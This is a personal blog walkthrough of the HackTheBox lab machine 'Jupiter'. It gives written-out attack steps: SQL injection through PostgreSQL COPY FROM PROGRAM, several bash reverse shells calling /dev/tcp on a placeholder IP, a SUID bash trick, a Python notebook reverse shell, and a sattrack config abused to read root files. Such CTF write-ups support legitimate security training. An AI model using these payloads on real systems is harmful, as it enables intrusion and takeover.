Jupiter – HTB Walkthrough

Introduction

In this walkthrough, I will go through medium htb box πŸ™‚

Recon

NMAP

As usual there are two ports open 22 and 80.

Let’s visit the site πŸ™‚

Lets add jupiter.htb to our /etc/hosts file .

Enumeration

I used ffuf and found one subdomain kiosk , add this to /etc/hosts.

Use Burp to visit the kiosk.jupiter.htb & then check the http history πŸ™‚

Now send this request to Repeater πŸ™‚

Advertisement

Change the rawSql param value to

"CREATE TABLE cmd_execd(cmd_output text); COPY cmd_exec FROM PROGRAM 'bash -c \"bash -i >& /dev/tcp/10.10.X.X/4444 0>&1\"'"

Now your modified req will look like this πŸ™‚

Note : Dont forget to start nc listener πŸ™‚

And GG you will get the revshell πŸ™‚

Foothold

Now we have got postgres user

In /dev/shm we can see the .yml file of juno and we have perm to write into it πŸ™‚

Lets upgrade the shell and edit the network-simulation.yml

general:
  # stop after 10 simulated seconds
  stop_time: 10s
  # old versions of cURL use a busy loop, so to avoid spinning in this busy
  # loop indefinitely, we add a system call latency to advance the simulated
  # time when running non-blocking system calls
  model_unblocked_syscall_latency: true

network:
  graph:
    # use a built-in network graph containing
    # a single vertex with a bandwidth of 1 Gbit
    type: 1_gbit_switch

hosts:
  # a host with the hostname 'server'
  server:
    network_node_id: 0
    processes:
    - path: /usr/bin/cp
      args: /bin/bash /tmp/bash
      start_time: 3s
  # three hosts with hostnames 'client1', 'client2', and 'client3'
  client:
    network_node_id: 0
    quantity: 3
    processes:
    - path: /usr/bin/chmod
      args: u+s /tmp/bash
      start_time: 5s

After this execute /tmp/bash -p to get the shell as juno

But we cannot read the user.txt because of uid ………………. but there is shadow-simulation.sh file in the home dir . Lets add the revshell to that script.

Our updated shadow-simulation.html will look like this

#!/bin/bash
cd /dev/shm
rm -rf /dev/shm/shadow.data
/home/juno/.local/bin/shadow /dev/shm/*.yml
cp -a /home/juno/shadow/examples/http-server/network-simulation.yml /dev/shm/
bash -i >& /dev/tcp/10.<ip>/4444 0>&1

After getting the shell as juno we can read the user.txt

User – Jovian

If you check the id the cmd you will see that juno belong to science group which gives access to /opt/solar-flares/

Do 'grep -rie token‘ in /opt/solar-flares/logs/ to find the right token of jupyter in the logs based on date.

lets use chisel to port forward 8888 and use this token

Now lets use that token of the current date πŸ™‚

After getting logged in we can exec cmd in flares.ipynb file

//RUN

import os; os.system('bash -c "bash -i >& /dev/tcp/10.10.<ip>/4444 0>&1"');

After executing it we will get the shell as Jovian

Root

Use sudo -l to check if there is some binary we can run as root user

Jovian can run /usr/local/bin/sattrack as root. We can get some infos about this executable by using the strings tool and then grep the output to see if it calls some config file

strings /usr/local/bin/sattrack | grep -i config

Look for it in the filesystem and copy it in the /tmp folder

find / -name config.json 2>/dev/null
cp /usr/local/share/sattrack/config.json /tmp

Now by running the sattrack executable as root we can see that it’s able to download in the working directory any file specified in a particular section of the config.json file. Let’s try to exploit this feature by requesting the root.txt we want to read.

nano config.json

Find tlesources section and replace any of the 3 url with file:///root/root.txt as shown below

"tlesources":[
    "file:///root/root.txt",
    "http://celestrak.org/NORAD/elements/n...",
    "http://celestrak.org/NORAD/elements/g..."
],

Save the new config.json and simply run sattrack as root. Enjoy the flag!

sudo /usr/local/bin/sattrack
cat /tmp/tle/root.txt

Conclusion

This box is pretty interesting and stressing at the same time, if you have personal instance then no problem πŸ™‚ I would like to rate this box 5/10.

Have a nice day !

Jay Shri Krishna ❀️❀️